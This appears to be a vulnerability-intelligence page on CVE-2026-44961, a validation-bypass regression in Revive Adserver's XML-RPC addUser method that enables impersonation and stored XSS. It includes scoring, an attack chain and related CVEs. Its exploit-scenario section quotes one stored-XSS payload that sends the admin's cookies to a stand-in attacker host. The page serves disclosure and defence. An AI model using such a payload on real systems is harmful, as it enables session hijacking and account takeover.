Skip to main content

Revive Adserver CVE-2026-44961

| EUVDEUVD-2026-38504 NONE
Improper Authentication (CWE-287)
2026-06-23 hackerone GHSA-9wv7-mm8f-m6cx

Severity by source

Vendor (hackerone) PRIMARY
0.0 NONE
AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
vuln.today AI
8.7 HIGH

API authentication required for addUser access (PR:L); stored XSS requires admin to view user list (UI:R); payload executes in victim browser with scope change (S:C), enabling session hijack (C:H) and impersonation (I:H).

3.1 AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N
4.0 AV:N/AC:L/AT:N/PR:L/UI:A/VC:N/VI:L/VA:N/SC:H/SI:H/SA:N

Primary rating from Vendor (hackerone).

CVSS VectorVendor: hackerone

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
Confidentiality
None
Integrity
None
Availability
None

Lifecycle Timeline

1
Analysis Generated
Jun 23, 2026 - 17:09 vuln.today

DescriptionCVE.org

The XML‑RPC API addUser method has a validation bypass introduced in the fix for CVE‑2025‑55129. As a result, API users could create usernames that enabled impersonation or stored XSS attacks. Proper validation has been added where it was missing.

AnalysisAI

Revive Adserver's XML-RPC API addUser method contains a validation bypass regression introduced by the patch for CVE-2025-55129, allowing authenticated API users to register usernames containing malicious payloads that enable impersonation of other accounts or deliver stored cross-site scripting attacks against administrative users. Reported via HackerOne (report #3680090), this vulnerability is not listed in CISA KEV and no public exploit has been identified at time of analysis. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Recon
Obtain valid API credentials
Delivery
Send addUser XML-RPC request with malicious username
Exploit
Bypass input validation due to regression
Install
Malicious username persisted in database
C2
Admin views user management interface
Execute
Stored XSS payload executes in admin browser
Impact
Admin session token exfiltrated

Vulnerability AssessmentAI

Exploitation Exploitation requires possession of valid Revive Adserver API credentials with sufficient permissions to invoke the addUser XML-RPC method - this is not a capability available to unauthenticated anonymous users, despite the erroneous PR:N in the provided CVSS placeholder. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The supplied CVSS 3.0 vector (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) is a null placeholder that cannot be used for risk assessment - it credits zero impact across all dimensions while the description clearly describes stored XSS and impersonation, which are material confidentiality and integrity risks. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker with valid API credentials submits an XML-RPC addUser request to a Revive Adserver instance, specifying a username such as '<script>document.location=\'https://attacker.tld/steal?c=\'+document.cookie</script>' or a string closely resembling an administrator account name. Because input validation is bypassed, the payload is stored without sanitization. …
Remediation The vulnerability description states that proper validation has been added, confirming a fix exists upstream, but no specific patched version number was identified in the available data. … Detailed patch versions, workarounds, and compensating controls in full report.

Threat intelligence, references, and detailed analysis are available after sign-in.

CVE-2023-26756 HIGH POC
7.5 Apr 14

The login page of Revive Adserver v5.4.1 is vulnerable to brute force attacks. Rated high severity (CVSS 7.5), this vuln

CVE-2026-50741 HIGH
8.8 Jun 26

Remote code execution in Revive Adserver is reachable by authenticated low-privilege users who bypass the prior fix for

CVE-2026-44959 HIGH
8.8 Jun 23

Authenticated PHP code injection in Revive Adserver 6.0.6 and earlier allows a low-privileged user to smuggle an unexpec

CVE-2026-34914 HIGH
8.3 Jun 23

Blind SQL injection in Revive Adserver 6.0.6 and earlier allows authenticated low-privileged users to inject arbitrary S

CVE-2026-50745 MEDIUM
6.1 Jun 26

Reflected cross-site scripting in Revive Adserver's stats-video.php script allows remote attackers to inject arbitrary J

CVE-2026-34915 MEDIUM
6.1 Jun 23

Blind SQL injection in Revive Adserver 6.0.6 and earlier allows a low-privileged authenticated user to exfiltrate databa

CVE-2026-50740 MEDIUM
5.4 Jun 26

Reflected XSS in Revive Adserver 6.0.7 and earlier allows a low-privileged user to inject unsanitized JavaScript via the

CVE-2026-50742 MEDIUM
5.4 Jun 26

Stored cross-site scripting in Revive Adserver 6.0.7 allows an authenticated low-privilege attacker to inject persistent

CVE-2026-44958 MEDIUM
5.4 Jun 23

Privilege escalation within Revive Adserver 6.0.6 and earlier allows authenticated advertiser-level users to activate or

CVE-2026-34917 MEDIUM
4.3 Jun 23

Session context confusion in Revive Adserver allows a low-privileged web admin console user to reuse their session ID ag

CVE-2026-50744 MEDIUM
4.3 Jun 26

Session fixation via failed authentication in Revive Adserver 6.0.7's XML-RPC API allows a low-privileged attacker to by

CVE-2026-50739 MEDIUM
4.3 Jun 26

Ownership validation bypass in Revive Adserver 6.0.7 and earlier allows a low-privileged authenticated user to link thei

Share

CVE-2026-44961 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy